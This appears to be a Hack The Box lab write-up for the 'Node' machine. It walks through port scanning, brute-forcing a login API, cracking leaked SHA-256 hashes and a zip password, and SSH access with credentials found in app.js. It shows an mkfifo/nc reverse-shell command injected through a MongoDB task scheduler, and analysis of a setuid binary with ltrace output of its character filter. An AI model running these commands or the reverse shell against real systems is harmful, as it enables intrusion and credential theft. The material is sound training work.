Node

From Luniwiki
Jump to: navigation, search

Back

Node01.png

Ports scan

u505@kali:~/HTB/Machines/Node$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.58

Starting masscan 1.0.5 at 2020-05-15 22:13:29 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 22/tcp on 10.10.10.58 Discovered open port 3000/tcp on 10.10.10.58
u505@kali:~/HTB/Machines/Node$ nmap -sC -sV 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:13 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.31 seconds
u505@kali:~/HTB/Machines/Node$ nmap -sC -sV -Pn 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 18:15 EDT
Nmap scan report for node.htb (10.10.10.58)
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE            VERSION
22/tcp   open  ssh                OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_  Logs: /login
| hadoop-tasktracker-info:
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.41 seconds

Web Enumeration

Node02.png

We have 3 users on the front page.

Node03.png

Node04.png

Dirsearch

u505@kali:~/HTB/Machines/Node$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,js" -r -R 4 -f -t 1000 --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" -u http://node.htb:3000

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html, js | HTTP method: get | Threads: 1000 | Wordlist size: 18379 | Recursion level: 4
Error Log: /opt/utils/dirsearch/logs/errors-20-05-15_18-35-40.log
Target: http://node.htb:3000
[18:35:40] Starting:
Task Completed

Dirsearch is unable to enumerate pages. But after a few tests, we see that the login page is presented for all unknown pages.

Brute force login page

Node05.png

Node06.png Node07.png

Node105.png

Node106.png Node107.png

We see the message is different, if the user is know. We can deduct that user admin doesn't exists.

u505@kali:~/HTB/Machines/Node$ cat users.txt
mark
rastating
tom
u505@kali:~/HTB/Machines/Node$ hydra -L users.txt -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt 10.10.10.58 -s 3000 http-post-form "/api/session/authenticate:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:{\"success\"\:false}:H=Content-Type\: application/json" -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-18 16:30:02 [INFORMATION] escape sequence \: detected in module option, no parameter verification is performed. [DATA] max 64 tasks per 1 server, overall 64 tasks, 28311 login tries (l:3/p:9437), ~443 tries per task [DATA] attacking http-post-form://10.10.10.58:3000/api/session/authenticate:{"username"\:"^USER^","password"\:"^PASS^"}:{"success"\:false}:H=Content-Type\: application/json [3000][http-post-form] host: 10.10.10.58 login: mark password: snowflake [STATUS] 17858.00 tries/min, 17858 tries in 00:01h, 10453 to do in 00:01h, 64 active [3000][http-post-form] host: 10.10.10.58 login: tom password: spongebob 1 of 1 target successfully completed, 2 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-18 16:31:09

We found 2 password out of 3.

Node112.png Node113.png

But they are useless.

User hashes

Node08.png

There is an API users.

Node09.png Node10.png

We see the users, and password hashes.

Node11.png

If we go back a folder, we retreive the full list of users with hashes and role. We find an admin user.

u505@kali:~/HTB/Machines/Node$ curl http://node.htb:3000/api/users/ | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   611  100   611    0     0   7833      0 --:--:-- --:--:-- --:--:--  7833
[
    {
        "_id": "59a7365b98aa325cc03ee51c",
        "is_admin": true,
        "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
        "username": "myP14ceAdm1nAcc0uNT"
    },
    {
        "_id": "59a7368398aa325cc03ee51d",
        "is_admin": false,
        "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
        "username": "tom"
    },
    {
        "_id": "59a7368e98aa325cc03ee51e",
        "is_admin": false,
        "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
        "username": "mark"
    },
    {
        "_id": "59aa9781cced6f1d1490fce9",
        "is_admin": false,
        "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
        "username": "rastating"
    }
]

We list users and hashes.

u505@kali:~/HTB/Machines/Node$ cat apiuser.hash
myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
rastating:5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0

We try to dictionary brute force them.

u505@kali:~/HTB/Machines/Node$ hashid dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Analyzing 'dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af'
[+] Snefru-256
[+] SHA-256
[+] RIPEMD-256
[+] Haval-256
[+] GOST R 34.11-94
[+] GOST CryptoPro S-Box
[+] SHA3-256
[+] Skein-256
[+] Skein-512(256)

It seems taht hashes are SHA-256.

u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...
...
u505@kali:~/HTB/Machines/Node$ hashcat -m 1400 apiuser.hash --username /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
mark:de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
tom:f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
myP14ceAdm1nAcc0uNT:dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester

We found 3 out of 4 passwords, but we found the admin password.

Log with admin user

Node12.png

We log with admin user.

Node13.png

This time there is a Download Backup button.

u505@kali:~/HTB/Machines/Node$ file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators
u505@kali:~/HTB/Machines/Node$ head myplace.backup
UEsDBAoAAAAAAHtvI0sAAAAAAAAAAAAAAAAQABwAdmFyL3d3dy9teXBsYWNlL1VUCQADyfyrWTAlv151eAsAAQQAAAAABAAAAABQSwMEFAAJAAgARQEiS0x97zc0EQAAEFMAACEAHAB2YXIvd3d3L215cGxhY2UvcGFja2FnZS1sb2NrLmpzb25VVAkAA9HoqVkwJb9edXgLAAEEAAAAAAQAAAAAgS+Bu1qnEne89oknmXE+3X+Sn7UnLI4PQ9DQ4abEF/C6ytQLOKbSNqVEdn4sgzNcP4tds65V9XBxxs7ZAuAhFHZdvx/BdUxI/8NV+WwWCgU43fR6ZkeEQ9uxY11ezlQ9R0dW4ULw

The file is encoded in base64.

u505@kali:~/HTB/Machines/Node$ cat myplace.backup | base64 -d > myplace.backup.decoded
u505@kali:~/HTB/Machines/Node$ file myplace.backup.decoded
myplace.backup.decoded: Zip archive data, at least v1.0 to extract
u505@kali:~/HTB/Machines/Node$ mv myplace.backup.decoded myplace.backup.decoded.zip
u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip
Archive:  myplace.backup.decoded.zip
   creating: var/www/myplace/
[myplace.backup.decoded.zip] var/www/myplace/package-lock.json password:

The zip file is encruypted.

u505@kali:~/HTB/Machines/Node$ zip2john myplace.backup.decoded.zip > zip.hash
u505@kali:~/HTB/Machines/Node$ john zip.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword        (myplace.backup.decoded.zip)
1g 0:00:00:00 DONE (2020-05-15 19:34) 50.00g/s 9830Kp/s 9830Kc/s 9830KC/s sandrad..pigglett
Use the "--show" option to display all of the cracked passwords reliably
Session completed

With the password we unzip the zip file.

u505@kali:~/HTB/Machines/Node$ unzip myplace.backup.decoded.zip
Archive:  myplace.backup.decoded.zip
[myplace.backup.decoded.zip] var/www/myplace/package-lock.json password:
  inflating: var/www/myplace/package-lock.json
  inflating: var/www/myplace/node_modules/serve-static/README.md
  inflating: var/www/myplace/node_modules/serve-static/index.js
  inflating: var/www/myplace/node_modules/serve-static/LICENSE
  inflating: var/www/myplace/node_modules/serve-static/HISTORY.md
  inflating: var/www/myplace/node_modules/serve-static/package.json
  inflating: var/www/myplace/node_modules/utils-merge/README.md
  inflating: var/www/myplace/node_modules/utils-merge/index.js
  inflating: var/www/myplace/node_modules/utils-merge/LICENSE
...

Access as mark

u505@kali:~/HTB/Machines/Node/var/www/myplace$ cat app.js
...
const express     = require('express');
const session     = require('express-session');
const bodyParser  = require('body-parser');
const crypto      = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const path        = require("path");
const spawn        = require('child_process').spawn;
const app         = express();
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
...

In the file app.js, the access at the MongoDB database is done with user mark and password is in clear text on the source file. We try to ssh with these credentials.

u505@kali:~/HTB/Machines/Node$ ssh mark@node.htb
The authenticity of host 'node.htb (10.10.10.58)' can't be established.
ECDSA key fingerprint is SHA256:I0Y7EMtrkyc9Z/92jdhXQen2Y8Lar/oqcDNLHn28Hbs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'node.htb,10.10.10.58' (ECDSA) to the list of known hosts.
mark@node.htb's password:

The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
.-. .-'``(|||) ,`\ \ `-`. 88 88 / \ '``-. ` 88 88 .-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88 (:::) : ___ 88 88 88 88 88 88 88 88 88 88 88 `-` ` ,  : 88 88 88 88 88 88 88 88 88 88 88 \ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88 `./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888' `-..-( ) `-`



The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3

Pivot to user Tom

Even before running enumeration scripts, we can easily notice that tom is running 2 processes.

mark@node:~$ ps -ef | grep tom
tom       1225     1  0 May15 ?        00:00:35 /usr/bin/node /var/www/myplace/app.js
tom       1240     1  0 May15 ?        00:00:02 /usr/bin/node /var/scheduler/app.js
mark      1602  1557  0 00:56 pts/0    00:00:00 grep --color=auto tom

The first one is the public application, but the second seems very interesting because of folder name.

mark@node:~$ cat /var/scheduler/app.js
const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) { if (error || !db) { console.log('[!] Failed to connect to mongodb'); return; }
setInterval(function () { db.collection('tasks').find().toArray(function (error, docs) { if (!error && docs) { docs.forEach(function (doc) { if (doc) { console.log('Executing task ' + doc._id + '...'); exec(doc.cmd); db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) }); } }); } else if (error) { console.log('Something went wrong: ' + error); } }); }, 30000);
});

This scheduler executes each 30 seconds the document from the collection task of the database scheduler.

mark@node:~$ ls -l /var/scheduler/app.js
-rw-rw-r-- 1 root root 910 Sep  3  2017 /var/scheduler/app.js

We cannot modify the program, but we can access the database.

mark@node:~$ mongo mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler
> show collections
tasks
> db.tasks.insertOne({cmd: "touch /tmp/u505"})
{
        "acknowledged" : true,
        "insertedId" : ObjectId("5ebf2e8080c0e28198b78e14")
}
> db.tasks.count()
1

After a few seconds, the empty file exists

mark@node:/tmp$ ls -l /tmp/u505
-rw-r--r-- 1 tom tom 0 May 16 01:06 /tmp/u505

And the documents doesn't exist anymore.

> db.tasks.count()
0

We raise a listener.

u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

And insert a new document.

> db.tasks.insertOne({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.34 4444 >/tmp/f"})
{
        "acknowledged" : true,
        "insertedId" : ObjectId("5ebf304c80c0e28198b78e16")
}
> db.tasks.count()
1

After a few seconds the shell opens as tom.

u505@kali:~/HTB/Machines/Node/var/www/myplace$ rlwrap nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.58.
Ncat: Connection from 10.10.10.58:49090.
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ stty raw -echo stty raw -echo tom@node:/$ id uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)

I directly noticed a group named admin with an high number. This group is an homemade admin group.

User flag

As tom we are able to read the user flag.

tom@node:/$ cd
tom@node:~$ cat user.txt
<USER_FLAG>

Enumeration

Before I ran the enumeration script, I looked on that admin group.

tom@node:~$ find / -gid 1002 2>/dev/null
/usr/local/bin/backup
tom@node:~$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup

There is only one file with this group, ans the file has the setuid flag on as root user. Sure that's our entry point for privileges escalation.

u505@kali:~/HTB/Machines/Node$ scp mark@node.htb:/usr/local/bin/backup ./backupnode
mark@node.htb's password:
backup                                        100%   16KB 207.7KB/s   00:00

Copy the file locally for analysis in depth.

Program analysis

Here is Node backup main decompilation.

And the flow of the main function.

Node15.png

There is a call at displayTarget

void displayTarget(char *param_1) 

{ char local_200 [508];
strcpy(local_200,param_1); printf(" %s[+]%s Starting archiving %s\n",&DAT_08049359,&DAT_08049340,local_200); return; }

The likelihood of buffer overflow in function displayTarget is very high. The strcpy copy the value of the parameter in the local variable, without any control. And this function is called from the main function with the third parameter.

Key file

u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[!] Could not open file

As expected, with 3 arguments, the program try to open a file to compare the second argument with the token contained in the file. The way to obtain the file name is very blurry in the decompiled code, to check the value of the variables, we launch a ltrace to see the filename.

u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 2 3
__libc_start_main(0x80489fd, 4, 0xff9dae54, 0x80492c0 <unfinished ...>
geteuid()                                              = 1000
setuid(1000)                                           = 0
strcmp("1", "-q")                                      = 1
puts("\n\n\n             ________________"...


____________________________________________________ ) = 69 puts(" / "... / \ ) = 67 puts(" | ________________"... | _____________________________________________ | ) = 68 puts(" | | "... | | | | ) = 68 ... puts("`---._.-------------------------"...`---._.-----------------------------------------------------------------._.---'

) = 82 strncpy(0xff9dad18, "2", 100) = 0xff9dad18 strcpy(0xff9dad01, "/") = 0xff9dad01 strcpy(0xff9dad0d, "/") = 0xff9dad0d strcpy(0xff9dac97, "/e") = 0xff9dac97 strcat("/e", "tc") = "/etc" strcat("/etc", "/m") = "/etc/m" strcat("/etc/m", "yp") = "/etc/myp" strcat("/etc/myp", "la") = "/etc/mypla" strcat("/etc/mypla", "ce") = "/etc/myplace" strcat("/etc/myplace", "/k") = "/etc/myplace/k" strcat("/etc/myplace/k", "ey") = "/etc/myplace/key" strcat("/etc/myplace/key", "s") = "/etc/myplace/keys" fopen("/etc/myplace/keys", "r") = 0 strcpy(0xff9d98e8, "Could not open file\n\n") = 0xff9d98e8 printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Could not open file\n\n" [!] Could not open file

) = 37 exit(1 <no return ...> +++ exited (status 1) +++

From the target server

mark@node:~$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110

We have valid key list, we copy them in our system.

u505@kali:~/HTB/Machines/Node$ mkdir -p etc/myplace
u505@kali:~/HTB/Machines/Node$ vi etc/myplace/keys
u505@kali:~/HTB/Machines/Node$ cat etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
u505@kali:~/HTB/Machines/Node$ sudo ln -s /home/u505/HTB/Machines/Node/etc/myplace /etc/myplace
u505@kali:~/HTB/Machines/Node$ cat /etc/myplace/keys
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
u505@kali:~/HTB/Machines/Node$ ./backupnode 1 2 3



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[!] Ah-ah-ah! You didn't say the magic word!

Now the program find the key file, and doesn't allow us because the token is not correct.

u505@kali:~/HTB/Machines/Node$ ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Starting archiving nofolder [!] The target path doesn't exist

This time the token is validated, but the program complains that the folder nofolder doesn't exist.

Not allowed characters

u505@kali:~/HTB/Machines/Node$ ltrace ./backupnode 1 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 nofolder
__libc_start_main(0x80489fd, 4, 0xff970c94, 0x80492c0 <unfinished ...>
geteuid()                                              = 1000
setuid(1000)                                           = 0
strcmp("1", "-q")                                      = 1
puts("\n\n\n             ________________"...


____________________________________________________ ) = 69 puts(" / "... / \ ) = 67 ... puts("`---._.-------------------------"...`---._.-----------------------------------------------------------------._.---'

) = 82 strncpy(0xff970b58, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff970b58 strcpy(0xff970b41, "/") = 0xff970b41 strcpy(0xff970b4d, "/") = 0xff970b4d strcpy(0xff970ad7, "/e") = 0xff970ad7 strcat("/e", "tc") = "/etc" strcat("/etc", "/m") = "/etc/m" strcat("/etc/m", "yp") = "/etc/myp" strcat("/etc/myp", "la") = "/etc/mypla" strcat("/etc/mypla", "ce") = "/etc/myplace" strcat("/etc/myplace", "/k") = "/etc/myplace/k" strcat("/etc/myplace/k", "ey") = "/etc/myplace/key" strcat("/etc/myplace/key", "s") = "/etc/myplace/keys" fopen("/etc/myplace/keys", "r") = 0x97d25b0 fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x97d25b0) = 0xff9706ef strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64 strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1 fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x97d25b0) = 0xff9706ef strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64 strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0 strcpy(0xff96f728, "Validated access token") = 0xff96f728 printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Validated access token" [+] Validated access token ) = 38 fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0) = 0xff9706ef strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64 strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1 fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x97d25b0) = 0 strstr("nofolder", "..") = nil strstr("nofolder", "/root") = nil strchr("nofolder", ';') = nil strchr("nofolder", '&') = nil strchr("nofolder", '`') = nil strchr("nofolder", '$') = nil strchr("nofolder", '|') = nil strstr("nofolder", "//") = nil strcmp("nofolder", "/") = 1 strstr("nofolder", "/etc") = nil strcpy(0xff96f91c, "nofolder") = 0xff96f91c printf(" %s[+]%s Starting archiving %s\n", "\033[32m", "\033[37m", "nofolder" [+] Starting archiving nofolder ) = 43 strcpy(0xff9704fb, "nofolder") = 0xff9704fb getpid() = 8639 time(0) = 1590009614 clock(0, 0, 0, 0) = 3247 srand(0x5e3d042d, 0x7243d4de, 0x5e3d042d, 0x804918c) = 0 rand(0, 0, 0, 0) = 0x6a7838b2 sprintf("/tmp/.backup_1786263730", "/tmp/.backup_%i", 1786263730) = 23 sprintf("/usr/bin/zip -r -P magicword /tm"..., "/usr/bin/zip -r -P magicword %s "..., "/tmp/.backup_1786263730", "nofolder") = 73 system("/usr/bin/zip -r -P magicword /tm"... <no return ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 3072 access("/tmp/.backup_1786263730", 0) = -1 strcpy(0xff96f728, "The target path doesn't exist") = 0xff96f728 printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "The target path doesn't exist" [!] The target path doesn't exist ) = 45 puts("\n"
) = 2 remove("/tmp/.backup_1786263730") = -1 fclose(0x97d25b0) = 0 +++ exited (status 0) +++

The third argument cannot begin with

  • /

or contain

  • /root
  •  ;
  • &
  • `
  • $
  • |
  • //
  • /etc

For example is we try a folder not allowed:

u505@kali:~/HTB/Machines/Node$ ./backupnode abc a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 /root/



____________________________________________________ / \ | _____________________________________________ | | | | | | | | | | | | | | | | | | | | | | | | | | | Secure Backup v1.0 | | | | | | | | | | | | | | | | | | | | | | | | | | | |_____________________________________________| | | | \_____________________________________________________/ \_______________________________________/ _______________________________________________ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_ :-----------------------------------------------------------------------------: `---._.-----------------------------------------------------------------._.---'

[+] Validated access token [+] Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
